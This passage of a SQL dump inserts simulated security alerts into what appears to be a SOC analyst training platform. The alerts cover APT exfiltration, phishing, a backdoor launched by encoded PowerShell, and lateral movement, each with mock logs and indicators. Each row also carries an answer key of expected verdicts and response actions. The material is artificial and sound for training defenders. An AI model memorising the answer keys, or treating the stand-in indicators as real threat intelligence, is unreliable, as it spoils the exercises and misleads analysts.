'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:31:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:30:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:29:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"},{\"timestamp\":\"2026-02-01T20:28:19.050Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:53Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"logon_type\\\":10,\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"logon_process\\\":\\\"User32\\\",\\\"authentication_package\\\":\\\"Negotiate\\\",\\\"logon_guid\\\":\\\"{b1a2b3c4-1d2e-3f45-6789-abcdef123456}\\\",\\\"transmitted_services\\\":\\\"-\\\",\\\"lm_package_name\\\":\\\"NTLM\\\",\\\"key_length\\\":128}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(442, 'Stealthy Data Exfiltration via Encrypted Channels', 'critical', 'Data loss prevention (DLP) systems', 'In the final stage, Volt Typhoon exfiltrates gathered intelligence through encrypted channels, ensuring the data leaves the network unnoticed.', 'Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"event_id\":\"EXP-2023-10-15-0001\",\"source_ip\":\"10.0.0.23\",\"destination_ip\":\"203.0.113.45\",\"encryption_protocol\":\"TLSv1.3\",\"destination_port\":443,\"data_size\":\"5GB\",\"user\":\"jdoe\",\"file_hash\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"filename\":\"confidential_data.zip\",\"process\":\"exfiltrator.exe\",\"internal_network\":\"192.168.1.0/24\",\"external_domain\":\"malicious-exfiltration.com\"}', '2026-01-04 23:57:10', '2026-02-16 18:20:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Volt Typhoon.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential exfiltration of sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain linked to malicious exfiltration 
activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(443, 'Phishing Email Detected', 'medium', 'Email Security Gateway', 'A phishing email was detected posing as an interview request. The email was sent from a known malicious IP address linked to Charming Kitten APT group, attempting to entice the target to engage.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:55:32Z\",\"email_id\":\"785e6a2f-1b7a-4f3c-bd8f-5d8f560f1f83\",\"from\":\"hr@fakecompany.com\",\"to\":\"targetuser@victimcompany.com\",\"subject\":\"Interview Request\",\"attacker_ip\":\"185.92.26.82\",\"recipient_ip\":\"192.168.1.15\",\"malicious_link\":\"http://malicious-link.com/interview\",\"attachment_name\":\"Interview_Schedule.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.82\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Charming Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/interview\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing URL used for credential harvesting.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash of a known phishing document.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:19.052Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(444, 'Malicious WhatsApp Message', 'medium', 'Mobile Device Management', 'A WhatsApp message was sent to a user containing a link to a fake interview form designed to harvest credentials. The message appears to be part of a social engineering attack aimed at gaining initial access to the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"device_id\":\"MDM-12345\",\"user\":\"jane.doe@example.com\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"message_id\":\"msg-7890\",\"whatsapp_message\":{\"sender\":\"+15551234567\",\"recipient\":\"+15559876543\",\"message_content\":\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"attachment_filename\":\"Interview_Form.pdf\"},\"indicators\":[{\"type\":\"url\",\"value\":\"http://malicious-link.com/form\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\"}]}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com/form\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used for phishing and credential harvesting.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with credential harvesting.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing 
campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this 
interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(445, 'DownPaper Backdoor Execution', 'high', 'Endpoint Detection and Response', 'The DownPaper backdoor has been executed on the victim\'s device following credential harvesting. This backdoor is used to maintain unauthorized access to the system.', 'Malware Execution', 'T1059.001: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"123456\",\"device\":\"WORKSTATION-01\",\"user\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"hash\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"event_type\":\"process_creation\",\"process_command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"description\":\"Execution of DownPaper backdoor detected\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DownPaper backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"downpaper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Filename associated with DownPaper malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(446, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With established access, the attacker uses the backdoor to move laterally within the network, seeking valuable data.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:45:27Z\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"malicious_ip\":\"203.0.113.45\",\"protocol\":\"RDP\",\"username\":\"admin_user\",\"file_name\":\"malware_backdoor.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"network_connection_attempt\",\"event_description\":\"RDP connection attempt detected from internal IP to another internal host using known malicious credentials.\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of target host.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_behavior_analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual login patterns detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malware_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus_scan\",\"verdict\":\"malicious\",\"details\":\"File identified as a backdoor used for lateral 
movement.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
